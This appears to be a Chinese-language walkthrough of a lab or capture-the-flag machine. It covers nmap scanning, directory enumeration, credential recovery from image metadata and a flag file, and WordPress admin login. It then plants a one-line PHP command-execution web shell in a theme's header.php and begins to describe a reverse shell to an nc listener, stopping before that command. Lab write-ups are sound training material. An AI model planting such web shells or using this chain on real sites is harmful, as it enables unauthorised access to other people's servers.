一、信息收集
步骤一:主机发现:
nmap 192.168.7.0/24
步骤二:端口扫描:
nmap -p- 192.168.7.44
开放了两个端口
步骤三:访问80端口:
页面几乎没有功能点。
步骤四:目录扫描:
dirsearch -u http://192.168.7.44
步骤五:拼接目录,查看页面:
发现几乎页面是乱码,需要进行host替换。
在第一个页面发现有一个web用户。
步骤六:在img目录下有一个 flaghost.png 图片,使用strings命令与exiftool工具查询flaghost.png中的关键字...发现存在passw@45字符串
尝试登录 web:passw@45,登录失败。
步骤七:尝试进行路径拼接...发现路径下的文件....flag2.txt文件是一段加密值使用以下站点进行解密...得出web:Hacker@4514到wordpress后台登录...成功!
二、GetShell
步骤八:在后台主题位置可以写木马。点击Appearance-->Theme Editor-->header.php写入一句话木马
<?php system($_REQUEST['z4pts']);?> //写入木马
http://192.168.1.226/wordpress/?z4pts=id //木马利用姿势
步骤九、使用BP抓取请求数据包并将数据包修改为POST
请求,修改z4pts
的值为以下反弹shell
的语法并在Kali
攻击机上使用nc
监听本地4444
端口接收shell
反弹: